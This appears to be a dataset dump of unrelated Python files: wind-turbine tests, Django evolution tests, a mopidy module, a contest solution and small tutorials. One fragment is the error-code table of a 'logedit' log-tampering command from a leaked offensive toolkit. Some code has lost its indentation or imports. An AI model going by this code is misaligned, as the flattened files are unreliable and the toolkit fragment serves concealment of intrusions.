from py_wake.wind_turbines.generic_wind_turbines import GenericWindTurbine, GenericTIRhoWindTurbine
from py_wake.examples.data import wtg_path
from py_wake.examples.data.dtu10mw import DTU10MW
import numpy as np
import matplotlib.pyplot as plt
from py_wake.tests import npt
import pytest
from py_wake.deficit_models.noj import NOJ
from py_wake.site.xrsite import XRSite
def test_GenericWindTurbine():
for ref, ti, p_tol, ct_tol in [(V80(), .1, 0.03, .16),
(WindTurbine.from_WAsP_wtg(wtg_path + "Vestas V112-3.0 MW.wtg"), .05, 0.035, .07),
(DTU10MW(), .05, 0.06, .13)]:
power_norm = ref.power(np.arange(10, 20)).max()
wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
turbulence_intensity=ti, ws_cutin=None)
if 0:
u = np.arange(0, 30, .1)
p, ct = wt.power_ct(u)
plt.plot(u, p / 1e6, label='Generic')
plt.plot(u, ref.power(u) / 1e6, label=ref.name())
plt.ylabel('Power [MW]')
plt.legend()
ax = plt.twinx()
ax.plot(u, ct, '--')
ax.plot(u, ref.ct(u), '--')
plt.ylabel('Ct')
plt.show()
u = np.arange(5, 25)
p, ct = wt.power_ct(u)
p_ref, ct_ref = ref.power_ct(u)
# print(np.abs(p_ref - p).max() / power_norm)
npt.assert_allclose(p, p_ref, atol=power_norm * p_tol)
# print(np.abs(ct_ref - ct).max())
npt.assert_allclose(ct, ct_ref, atol=ct_tol)
@pytest.mark.parametrize(['power_idle', 'ct_idle'], [(0, 0), (100, .1)])
def test_GenericWindTurbine_cut_in_out(power_idle, ct_idle):
ref = V80()
power_norm = ref.power(15)
wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
turbulence_intensity=0, ws_cutin=3, ws_cutout=25, power_idle=power_idle, ct_idle=ct_idle)
if 0:
u = np.arange(0, 30, .1)
p, ct = wt.power_ct(u)
plt.plot(u, p / 1e6, label='Generic')
plt.plot(u, ref.power(u) / 1e6, label=ref.name())
plt.ylabel('Power [MW]')
plt.legend()
ax = plt.twinx()
ax.plot(u, ct, '--')
ax.plot(u, ref.ct(u), '--')
plt.ylabel('Ct')
plt.show()
assert wt.ct(2.9) == ct_idle
assert wt.power(2.9) == power_idle
assert wt.ct(25.1) == ct_idle
assert wt.power(25.1) == power_idle
def test_GenericTIRhoWindTurbine():
wt = GenericTIRhoWindTurbine('2MW', 80, 70, 2000, )
ws_lst = [11, 11, 11]
ti_lst = [0, .1, .2]
p11, ct11 = wt.power_ct(ws=ws_lst, TI_eff=ti_lst, Air_density=1.225)
p11 /= 1e6
if 0:
u = np.arange(3, 28, .1)
ax1 = plt.gca()
ax2 = plt.twinx()
for ti in ti_lst:
p, ct = wt.power_ct(u, TI_eff=ti, Air_density=1.225)
ax1.plot(u, p / 1e6, label='TI=%f' % ti)
ax2.plot(u, ct, '--')
ax1.plot(ws_lst, p11, '.')
ax2.plot(ws_lst, ct11, 'x')
print(p11.tolist())
print(ct11.tolist())
ax1.legend()
ax1.set_ylabel('Power [MW]')
ax2.set_ylabel('Ct')
plt.show()
npt.assert_array_almost_equal([1.833753, 1.709754, 1.568131], p11)
npt.assert_array_almost_equal([0.793741, 0.694236, 0.544916], ct11)
ws_lst = [10] * 3
rho_lst = [0.9, 1.225, 1.5]
p10, ct10 = wt.power_ct(ws=ws_lst, TI_eff=0.1, Air_density=rho_lst)
p10 /= 1e6
if 0:
u = np.arange(3, 28, .1)
ax1 = plt.gca()
ax2 = plt.twinx()
for rho in rho_lst:
p, ct = wt.power_ct(u, TI_eff=0.1, Air_density=rho)
ax1.plot(u, p / 1e6, label='Air density=%f' % rho)
ax2.plot(u, ct, '--')
ax1.plot(ws_lst, p10, '.')
ax2.plot(ws_lst, ct10, 'x')
print(p10.tolist())
print(ct10.tolist())
ax1.legend()
ax1.set_ylabel('Power [MW]')
ax2.set_ylabel('Ct')
plt.show()
npt.assert_array_almost_equal([1.040377569594173, 1.3934596754744593, 1.6322037609434554], p10)
npt.assert_array_almost_equal([0.7987480617157162, 0.7762418395479502, 0.7282996179383272], ct10)
| [
"[email protected]"
] | |
01d3ab118c111cade14811b445555a634d2d86f8 | 2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac | /Dsz/PyScripts/Lib/dsz/mca/file/cmd/logedit/errors.py | 9078f31a6058462a9312fcb46aac6150a7228736 | [] | no_license | FingerLeakers/DanderSpritz_docs | f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364 | d96b6a71c039b329f9f81544f645857c75360e7f | refs/heads/master | 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null | UTF-8 | Python | false | false | 1,344 | py | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: errors.py
import mcl.status
ERR_SUCCESS = mcl.status.MCL_SUCCESS
ERR_INVALID_PARAM = mcl.status.framework.ERR_START
ERR_MARSHAL_FAILED = mcl.status.framework.ERR_START + 1
ERR_GET_FULL_PATH_FAILED = mcl.status.framework.ERR_START + 2
ERR_OPENFILE_FAILED = mcl.status.framework.ERR_START + 3
ERR_ALLOC_FAILED = mcl.status.framework.ERR_START + 4
ERR_WRITE_FILE_FAILED = mcl.status.framework.ERR_START + 5
ERR_UNICODE_NOT_SUPPORTED = mcl.status.framework.ERR_START + 6
ERR_NO_GOOD_LINES_FOUND = mcl.status.framework.ERR_START + 7
ERR_NO_MATCHING_LINES_FOUND = mcl.status.framework.ERR_START + 8
errorStrings = {ERR_INVALID_PARAM: 'Invalid parameter(s)',
ERR_MARSHAL_FAILED: 'Marshaling data failed',
ERR_GET_FULL_PATH_FAILED: 'Get of full file path failed',
ERR_OPENFILE_FAILED: 'Open of file failed',
ERR_ALLOC_FAILED: 'Memory allocation failed',
ERR_WRITE_FILE_FAILED: 'Write to file failed',
ERR_UNICODE_NOT_SUPPORTED: 'Unicode is not supported on this platform',
ERR_NO_GOOD_LINES_FOUND: 'No good lines found for replacement of bad lines',
ERR_NO_MATCHING_LINES_FOUND: 'No lines found with the given phrase'
} | [
"[email protected]"
] | |
3ce562a5e5b5881b87d936099c74eb0efc486b7b | 05de912d5579e031a8ccaeb9b8ea70f1431b82ad | /mopidy/audio/mixers/__init__.py | feaccc3d077f9d2b34cbf8dfeb1dad65870713f2 | [
"Apache-2.0"
] | permissive | cave-scorpion/mopidy | bcb0939ddacb0bd295ad36c2b073b369869a15cf | 5d83e3e97a47efcfa62558ba57fd394b8c311aa6 | refs/heads/master | 2021-01-16T22:16:21.134218 | 2013-03-31T14:59:30 | 2013-03-31T14:59:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | from __future__ import unicode_literals
import pygst
pygst.require('0.10')
import gst
import gobject
from .auto import AutoAudioMixer
from .fake import FakeMixer
from .nad import NadMixer
def register_mixer(mixer_class):
gobject.type_register(mixer_class)
gst.element_register(
mixer_class, mixer_class.__name__.lower(), gst.RANK_MARGINAL)
def register_mixers():
register_mixer(AutoAudioMixer)
register_mixer(FakeMixer)
register_mixer(NadMixer)
| [
"[email protected]"
] | |
e6ba65a1e4349381acba5c01404dcd17efb2c8d3 | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderBeginnerContest/1XX/186/E_another.py | 5cd6db2ce83b44b90602978bdf66cc3d4f96d6b5 | [] | no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 1,876 | py | """
以下を参考に作成
https://twitter.com/kyopro_friends/status/1341216644727676928
s + k * x ≡ 0 mod n を解く(xを求める).
鳥の巣原理から x <= n のため,
x = im + j (0 <= i, j <= m = n**0.5)
と表せる.
j が 0 ~ m の時の位置(s + k * j mod n)を前計算し,mapに持っておく(jmap).
s + k * (im + j) ≡ 0 mod n
s + k * j + k * im ≡ 0 mod n
((s + k * j) mod n) + (k * im mod n) = n or 0 ≡ 0 mod n
と表せるため, ある i に対して
(k * im mod n) + p = n or 0
となるような p が jmap に存在していれば, その時の im + j が答えとなる.
これを i が 0 ~ m の範囲で全探索し, 存在していなければ -1 となる.
@Baby-Step Giant-Step
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
from collections import Counter
inf = float('inf')
mod = 10 ** 9 + 7
# from decorator import stop_watch
#
#
# @stop_watch
def solve(T, NSK):
for n, s, k in NSK:
m = int(n ** 0.5) + 1
jmap = {}
for j in range(m):
tmp = (s + k * j) % n
jmap.setdefault(tmp, j)
jmap[tmp] = min(j, jmap[tmp])
for i in range(m):
tmp = (n - (k * i * m) % n) % n
if jmap.get(tmp, - 1) >= 0:
print(i * m + jmap[tmp])
break
else:
print(-1)
if __name__ == '__main__':
T = int(input())
NSK = [[int(i) for i in input().split()] for _ in range(T)]
solve(T, NSK)
# # test
# from random import randint
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# T = 100
# NSK = []
# for _ in range(T):
# N = randint(1, 10 ** 9)
# S = randint(1, N - 1)
# K = randint(1, 10 ** 9)
# NSK.append([N, S, K])
# solve(T, NSK)
| [
"[email protected]"
] | |
61b606c1dfe74cfc71a5244dcf12c871c3d47dee | 1fea3ad1608fbe8d7a695176ce001c32992baab4 | /web_scraping/ec2files/ec2file0.py | bdcb33fe4e712a9908fed1ce7a984655bbc9e087 | [
"MIT"
] | permissive | cmgospod/Groa | 2119714f57bb911d5c9c91597a1b6558448d5dd6 | 31b3624bfe61e772b55f8175b4e95d63c9e67966 | refs/heads/master | 2021-01-02T08:06:29.570942 | 2020-02-07T20:10:54 | 2020-02-07T20:10:54 | 239,560,447 | 1 | 0 | MIT | 2020-02-10T16:38:32 | 2020-02-10T16:38:31 | null | UTF-8 | Python | false | false | 109 | py | from scraper import *
s = Scraper(start=0, end=1781, max_iter=30, scraper_instance=0)
s.scrape_letterboxd() | [
"[email protected]"
] | |
a3b8e7c2bd30a297c6acbb500964593d46332088 | 3d82768d4f912eb940a1238a3b6347c727e52558 | /expense/migrations/0004_auto_20201024_1825.py | 83e59278f488ec0faee9c08743a0a6ee6c64bc63 | [] | no_license | surajit003/tdd-expense-app | b4dd53c1328f4dd40b39593e09f8afe9e811ff4a | 603c6f56ce35944c1acf8deefd6d7b420576e65d | refs/heads/main | 2023-01-08T16:01:42.102279 | 2020-11-08T20:47:04 | 2020-11-08T20:47:04 | 305,830,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | # Generated by Django 3.1.2 on 2020-10-24 18:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("expense", "0003_auto_20201024_1816")]
operations = [
migrations.AlterField(
model_name="expense",
name="expense_id",
field=models.CharField(
default="d3ccef36-3709-4d60-b5fe-d673ee9d3933",
max_length=120,
primary_key=True,
serialize=False,
),
),
migrations.AlterField(
model_name="expense",
name="total",
field=models.FloatField(blank=True, null=True, verbose_name="Total"),
),
]
| [
"[email protected]"
] | |
7514b141abc126e5037f7efc1213d03689bc0d9c | e7a87d9eca87d8be7b23b3a57c1d49f0ad6d20bc | /django_evolution/tests/test_evolution_graph.py | 6605ada4d37302b6934cfd1385ab441c14c50fee | [
"BSD-2-Clause"
] | permissive | beanbaginc/django-evolution | 19a775a223b61861f503925216fb236b822122c0 | 756eedeacc41f77111a557fc13dee559cb94f433 | refs/heads/master | 2023-06-22T07:25:32.401292 | 2022-11-10T03:23:50 | 2022-11-10T03:23:50 | 14,189,401 | 22 | 13 | null | 2015-01-07T01:15:08 | 2013-11-07T00:04:43 | Python | UTF-8 | Python | false | false | 24,833 | py | """Unit tests for django_evolution.utils.graph.EvolutionGraph."""
from __future__ import unicode_literals
from django.db import DEFAULT_DB_ALIAS, connections
from django_evolution.compat.apps import get_app
from django_evolution.models import Evolution, Version
from django_evolution.support import supports_migrations
from django_evolution.tests.base_test_case import (MigrationsTestsMixin,
TestCase)
from django_evolution.tests.decorators import requires_migrations
from django_evolution.tests.evolutions_app.models import EvolutionsAppTestModel
from django_evolution.tests.evolutions_app2.models import \
EvolutionsApp2TestModel
from django_evolution.utils.graph import EvolutionGraph
from django_evolution.utils.migrations import (MigrationExecutor,
MigrationList,
MigrationLoader,
record_applied_migrations)
try:
# Django >= 1.7
from django.db import migrations
from django.db.migrations.graph import MigrationGraph
except ImportError:
# Django < 1.7
MigrationGraph = None
migrations = None
class EvolutionGraphTests(MigrationsTestsMixin, TestCase):
"""Unit tests for django_evolution.utils.graph.EvolutionGraph."""
def test_add_evolutions(self):
"""Testing EvolutionGraph.add_evolutions"""
app = get_app('django_evolution')
evolutions = [
Evolution(app_label='django_evolution',
label='my_evolution1'),
Evolution(app_label='django_evolution',
label='my_evolution2'),
]
graph = EvolutionGraph()
graph.add_evolutions(
app=app,
evolutions=evolutions,
new_models=[
Evolution,
Version,
],
extra_state={
'foo': 'bar',
})
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 6)
self._check_node(
nodes[0],
insert_index=0,
key='evolution:django_evolution:__first__',
required_by={
'create-model:django_evolution:evolution',
},
state={
'anchor': True,
'app': app,
})
self._check_node(
nodes[1],
insert_index=1,
key='create-model:django_evolution:evolution',
dependencies={
'evolution:django_evolution:__first__'
},
required_by={
'create-model:django_evolution:version',
},
state={
'app': app,
'foo': 'bar',
'model': Evolution,
'type': graph.NODE_TYPE_CREATE_MODEL,
})
self._check_node(
nodes[2],
insert_index=2,
key='create-model:django_evolution:version',
dependencies={
'create-model:django_evolution:evolution'
},
required_by={
'evolution:django_evolution:my_evolution1',
},
state={
'app': app,
'foo': 'bar',
'model': Version,
'type': graph.NODE_TYPE_CREATE_MODEL,
})
self._check_node(
nodes[3],
insert_index=3,
key='evolution:django_evolution:my_evolution1',
dependencies={
'create-model:django_evolution:version'
},
required_by={
'evolution:django_evolution:my_evolution2',
},
state={
'app': app,
'evolution': evolutions[0],
'foo': 'bar',
'type': graph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[4],
insert_index=4,
key='evolution:django_evolution:my_evolution2',
dependencies={
'evolution:django_evolution:my_evolution1'
},
required_by={
'evolution:django_evolution:__last__',
},
state={
'app': app,
'evolution': evolutions[1],
'foo': 'bar',
'type': graph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[5],
insert_index=5,
key='evolution:django_evolution:__last__',
dependencies={
'evolution:django_evolution:my_evolution2'
},
state={
'anchor': True,
'app': app,
})
@requires_migrations
def test_add_migration_plan(self):
"""Testing EvolutionGraph.add_migration_plan"""
class TestsInitialMigration(migrations.Migration):
pass
class TestsAddFieldMigration(migrations.Migration):
dependencies = [
('tests', '0001_initial'),
]
class OtherInitialMigration(migrations.Migration):
dependencies = [('tests', '0002_add_field')]
graph = EvolutionGraph()
migration_plan = self._add_migrations(
graph=graph,
migrations_info=[
('tests', '0001_initial', TestsInitialMigration),
('tests', '0002_add_field', TestsAddFieldMigration),
('other', '0001_initial', OtherInitialMigration),
],
leaf_migration_targets=[('other', '0001_initial')])
self.assertEqual(len(migration_plan), 3)
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
insert_index=0,
key='migration:tests:0001_initial',
required_by={
'migration:tests:0002_add_field',
},
state={
'migration_plan_item': migration_plan[0],
'migration_target': ('tests', '0001_initial'),
'type': graph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[1],
insert_index=1,
key='migration:tests:0002_add_field',
dependencies={
'migration:tests:0001_initial',
},
required_by={
'migration:other:0001_initial',
},
state={
'migration_plan_item': migration_plan[1],
'migration_target': ('tests', '0002_add_field'),
'type': graph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[2],
key='migration:other:0001_initial',
dependencies={
'migration:tests:0002_add_field',
},
state={
'migration_plan_item': migration_plan[2],
'migration_target': ('other', '0001_initial'),
'type': graph.NODE_TYPE_MIGRATION,
})
def test_mark_evolutions_applied(self):
"""Testing EvolutionGraph.mark_evolutions_applied"""
app_label = 'app_deps_app'
app = get_app(app_label)
evolutions = [
Evolution(app_label=app_label,
label='test_evolution'),
]
graph = EvolutionGraph()
graph.process_migration_deps = False
graph.add_evolutions(app=app,
evolutions=evolutions)
graph.mark_evolutions_applied(app=get_app('evolutions_app'),
evolution_labels=['first_evolution'])
graph.mark_evolutions_applied(app=get_app('evolutions_app2'),
evolution_labels=['second_evolution'])
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
insert_index=0,
key='evolution:app_deps_app:__first__',
required_by={
'evolution:app_deps_app:test_evolution',
},
state={
'anchor': True,
'app': app,
})
self._check_node(
nodes[1],
insert_index=1,
key='evolution:app_deps_app:test_evolution',
dependencies={
'evolution:app_deps_app:__first__',
},
required_by={
'evolution:app_deps_app:__last__',
},
state={
'app': app,
'evolution': evolutions[0],
'type': graph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[2],
insert_index=2,
key='evolution:app_deps_app:__last__',
dependencies={
'evolution:app_deps_app:test_evolution',
},
state={
'anchor': True,
'app': app,
})
@requires_migrations
def test_mark_migrations_applied(self):
"""Testing EvolutionGraph.mark_migrations_applied"""
class TestsInitialMigration(migrations.Migration):
pass
class TestsAddFieldMigration(migrations.Migration):
dependencies = [
('tests', '0001_initial'),
]
class OtherInitialMigration(migrations.Migration):
dependencies = [('tests', '0002_add_field')]
graph = EvolutionGraph()
migration_plan = self._add_migrations(
graph=graph,
migrations_info=[
('tests', '0001_initial', TestsInitialMigration),
('tests', '0002_add_field', TestsAddFieldMigration),
('other', '0001_initial', OtherInitialMigration),
],
leaf_migration_targets=[('other', '0001_initial')],
mark_applied=[
('tests', '0001_initial'),
('tests', '0002_add_field'),
])
self.assertEqual(len(migration_plan), 1)
graph.finalize()
nodes = graph.get_ordered()
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
insert_index=0,
key='migration:other:0001_initial',
state={
'migration_plan_item': migration_plan[0],
'migration_target': ('other', '0001_initial'),
'type': graph.NODE_TYPE_MIGRATION,
})
def test_iter_batches(self):
"""Testing EvolutionGraph.iter_batches"""
evolutions_app = get_app('evolutions_app')
evolutions_app2 = get_app('evolutions_app2')
evolution_deps_app = get_app('evolution_deps_app')
# evolutions_app
evolutions1 = [
Evolution(app_label='evolutions_app',
label='first_evolution'),
Evolution(app_label='evolutions_app',
label='second_evolution'),
]
models1 = [EvolutionsAppTestModel]
# evolutions_app2
evolutions2 = [
Evolution(app_label='evolutions_app2',
label='first_evolution'),
Evolution(app_label='evolutions_app2',
label='second_evolution'),
]
models2 = [EvolutionsApp2TestModel]
# evolution_deps_app
evolutions3 = [
Evolution(app_label='evolution_deps_app',
label='test_evolution'),
]
graph = EvolutionGraph()
graph.process_migration_deps = supports_migrations
if supports_migrations:
connection = connections[DEFAULT_DB_ALIAS]
migration_executor = MigrationExecutor(connection=connection)
migration_loader = MigrationLoader(connection=connection)
migration_plan = migration_executor.migration_plan([
('migrations_app', '0002_add_field'),
('migrations_app2', '0002_add_field'),
])
migration_loader.build_graph()
graph.add_migration_plan(migration_plan=migration_plan,
migration_graph=migration_loader.graph)
else:
migration_plan = None
graph.add_evolutions(app=evolutions_app,
evolutions=evolutions1,
new_models=models1)
graph.add_evolutions(app=evolutions_app2,
evolutions=evolutions2,
new_models=models2)
graph.add_evolutions(app=evolution_deps_app,
evolutions=evolutions3)
graph.finalize()
all_batches = list(graph.iter_batches())
if supports_migrations:
self.assertEqual(len(all_batches), 6)
excluded_migration_deps = set()
else:
self.assertEqual(len(all_batches), 4)
excluded_migration_deps = {
'migration:migrations_app:0001_initial',
'migration:migrations_app2:0002_add_field',
}
# Turn this back into a generator so we can more easily check these
# batches with/without migrations, depending on the version of Django
# the tests are being run on.
batches = iter(all_batches)
# Check the first migrations batch.
if supports_migrations:
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_MIGRATION)
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
key='migration:migrations_app:0001_initial',
required_by={
'evolution:evolution_deps_app:test_evolution',
'migration:migrations_app:0002_add_field',
},
state={
'migration_plan_item': migration_plan[0],
'migration_target': ('migrations_app', '0001_initial'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[1],
key='migration:migrations_app:0002_add_field',
dependencies={
'migration:migrations_app:0001_initial',
},
required_by={
'migration:migrations_app2:0001_initial',
},
state={
'migration_plan_item': migration_plan[1],
'migration_target': ('migrations_app', '0002_add_field'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[2],
key='migration:migrations_app2:0001_initial',
dependencies={
'migration:migrations_app:0002_add_field',
},
required_by={
'migration:migrations_app2:0002_add_field',
},
state={
'migration_plan_item': migration_plan[2],
'migration_target': ('migrations_app2', '0001_initial'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
# Check the first create-model batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_CREATE_MODEL)
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
key='create-model:evolutions_app:evolutionsapptestmodel',
dependencies={
'evolution:evolutions_app:__first__',
},
required_by={
'evolution:evolutions_app:first_evolution',
},
state={
'app': evolutions_app,
'model': EvolutionsAppTestModel,
'type': EvolutionGraph.NODE_TYPE_CREATE_MODEL,
})
# Check the first evolution batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_EVOLUTION)
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
key='evolution:evolutions_app:first_evolution',
dependencies={
'create-model:evolutions_app:evolutionsapptestmodel',
},
required_by={
'evolution:evolution_deps_app:test_evolution',
'evolution:evolutions_app:second_evolution',
},
state={
'app': evolutions_app,
'evolution': evolutions1[0],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[1],
key='evolution:evolutions_app:second_evolution',
dependencies={
'evolution:evolutions_app:first_evolution',
},
required_by={
'evolution:evolutions_app:__last__',
},
state={
'app': evolutions_app,
'evolution': evolutions1[1],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[2],
key='evolution:evolution_deps_app:test_evolution',
dependencies={
'evolution:evolution_deps_app:__first__',
'evolution:evolutions_app:first_evolution',
'evolution:evolutions_app:__last__',
'migration:migrations_app:0001_initial',
} - excluded_migration_deps,
required_by={
'evolution:evolution_deps_app:__last__',
'evolution:evolutions_app2:__first__',
'evolution:evolutions_app2:second_evolution',
'migration:migrations_app2:0002_add_field',
} - excluded_migration_deps,
state={
'app': evolution_deps_app,
'evolution': evolutions3[0],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
if supports_migrations:
# Check the second migration batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_MIGRATION)
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
key='migration:migrations_app2:0002_add_field',
dependencies={
'evolution:evolution_deps_app:test_evolution',
'migration:migrations_app2:0001_initial',
},
state={
'migration_plan_item': migration_plan[3],
'migration_target': ('migrations_app2', '0002_add_field'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
# Check the second create-model batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_CREATE_MODEL)
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
key='create-model:evolutions_app2:evolutionsapp2testmodel',
dependencies={
'evolution:evolutions_app2:__first__',
},
required_by={
'evolution:evolutions_app2:first_evolution',
},
state={
'app': evolutions_app2,
'model': EvolutionsApp2TestModel,
'type': EvolutionGraph.NODE_TYPE_CREATE_MODEL,
})
# Check the second evolution batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_EVOLUTION)
self.assertEqual(len(nodes), 2)
self._check_node(
nodes[0],
key='evolution:evolutions_app2:first_evolution',
dependencies={
'create-model:evolutions_app2:evolutionsapp2testmodel',
},
required_by={
'evolution:evolutions_app2:second_evolution',
},
state={
'app': evolutions_app2,
'evolution': evolutions2[0],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[1],
key='evolution:evolutions_app2:second_evolution',
dependencies={
'evolution:evolution_deps_app:test_evolution',
'evolution:evolutions_app2:first_evolution',
},
required_by={
'evolution:evolutions_app2:__last__',
},
state={
'app': evolutions_app2,
'evolution': evolutions2[1],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
def _add_migrations(self, graph, migrations_info, leaf_migration_targets,
mark_applied=[]):
"""Add migrations to a graph.
This is a utility for simplifying the additions of a list of
migrations to a graph, handling the creation of the Django migration
objects, the formulation of a migration plan, and the recording of
applied migrations.
Args:
graph (django_evolution.utils.graph.EvolutionGraph):
The graph to add migrations to.
migrations_info (list of tuple):
The list of info on migrations to add. Each tuple contains:
1. The app label
2. The migration name
3. The migration class
leaf_migration_targets (list of tuple):
The list of final migration targets to migrate to.
mark_applied (list of tuple, optional):
The list of migration targets to mark as applied.
Returns:
list of tuple:
The migration plan generated from the migrations.
"""
migration_list = MigrationList()
for app_label, name, migration_cls in migrations_info:
migration_list.add_migration_info(
app_label=app_label,
name=name,
migration=migration_cls(name, app_label))
connection = connections[DEFAULT_DB_ALIAS]
if mark_applied:
mark_applied_list = MigrationList()
mark_applied_list.add_migration_targets(mark_applied)
record_applied_migrations(connection, mark_applied_list)
else:
mark_applied_list = None
migration_executor = MigrationExecutor(
connection=connection,
custom_migrations=migration_list)
migration_loader = MigrationLoader(
connection=connection,
custom_migrations=migration_list)
migration_plan = \
migration_executor.migration_plan(leaf_migration_targets)
migration_loader.build_graph()
graph.add_migration_plan(migration_plan=migration_plan,
migration_graph=migration_loader.graph)
if mark_applied_list:
graph.mark_migrations_applied(mark_applied_list)
return migration_plan
def _check_node(self, node, key, insert_index=None, dependencies=set(),
required_by=set(), state={}):
"""Check a graph node for validity.
This will assert if any of the provided arguments don't match the
node.
Args:
node (django_evolution.utils.graph.Node):
The graph node to check.
key (unicode):
The expected node key.
insert_index (int, optional):
The expected insert index. If not provided, this won't be
checked.
dependencies (set, optional):
The node keys expected as dependencies.
required_by (set, optional):
The node keys expected to require this node.
state (dict, optional):
The expected state of the node.
Raises:
AssertionError:
The node did not match the expected arguments.
"""
self.assertEqual(node.key, key)
self.assertEqual(node.state, state)
self.assertEqual({_node.key for _node in node.dependencies},
dependencies)
self.assertEqual({_node.key for _node in node.required_by},
required_by)
if insert_index is not None:
self.assertEqual(node.insert_index, insert_index)
| [
"[email protected]"
] | |
2e43ad66add5cc370ee3dc18b1754c8d45d8b1fe | 31eaed64b0caeda5c5fe3603609402034e6eb7be | /ignorancia_zero/iz_aula-064 - programação orientada a objetos.py | e7aa8a74376c2e9fbd0ede1bee421dec1ba61654 | [] | no_license | RaphaelfsOliveira/workspace_python | 93657b581043176ecffb5783de208c0a00924832 | 90959697687b9398cc48146461750942802933b3 | refs/heads/master | 2021-01-11T17:39:49.574875 | 2017-06-28T20:55:43 | 2017-06-28T20:55:43 | 79,814,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,418 | py | # metodo especial construtor de objeto
# instancia o objeto
'__init__'
# devolve o objeto no formato de um dicionario
'__dict__'
# transforma o objeto em string, tem sempre que retornar uma string
'__str__'
# faz operações com outra instancia do objeto somente com sinal + - / *
'__add__'
#imprime na tela a documentação escrita na classe do objeto instanciado
'__doc__'
class Conta(object):
'''O Objeto conta representa uma conta de banco'''
def __init__(self, ID, saldo):
'''metodo construtor do objeto'''
self.ID = ID
self.saldo = saldo
def __str__(self):
'''transforma o objeto em string'''
return 'ID: %d\nSaldo R$: %.2f' %(self.ID, self.saldo)
def __add__(self, outro):
'''faz operações com outra instancia do objeto somente com sinal + - / *'''
self.saldo += outro.saldo
def __call__(self, x):
'''torna o objeto chamavel para realizar alguma operação'''
return x
bra = Conta(123, 5000)
ita = Conta(456, 8000)
print(bra.__dict__, '__dict__ devolve o objeto como dicionario')
print(bra.__doc__, '__doc__ documentação da classe do objeto')
'''
>>> class Pai:
pass
>>> class Filho(Pai):
pass
>>> class Neto(Filho):
pass
>>> issubclass(Pai, Filho)
False
>>> issubclass(Filho, Pai)
True
>>> Filho.__bases__
(<class '__main__.Pai'>,)
>>> Neto.__bases__
(<class '__main__.Filho'>,)
'''
| [
"[email protected]"
] | |
bfb960beefa750bcc845e2efc49507af9740647a | 52a61caff0aeb434c32e5657e38762643e9f57dd | /DataStructuresAndAlgorithms/SearchAndSort/Search/BinarySearch/functionBinarySearch.py | 6a7e15608caca8460acd2988b9f9a53c5f770492 | [] | no_license | AndrewErmakov/PythonTrainingBasics | 1480a6378d1ec59884760e2b3014ccc3d28f058f | 639e15bbfc54da762cb9e366497754cfece30691 | refs/heads/master | 2021-06-10T15:57:58.682335 | 2021-03-25T13:37:30 | 2021-03-25T13:37:30 | 153,678,760 | 0 | 0 | null | 2018-10-30T13:52:51 | 2018-10-18T19:45:47 | Python | UTF-8 | Python | false | false | 596 | py | def binary_search(list_num: list, number: int) -> int:
"""Выводит индекс значения, которое мы ищем, иначе выводится НЕ НАЙДЕНО"""
low_border = 0
high_border = len(list_num) - 1
while low_border <= high_border:
mid = low_border + (high_border - low_border) // 2
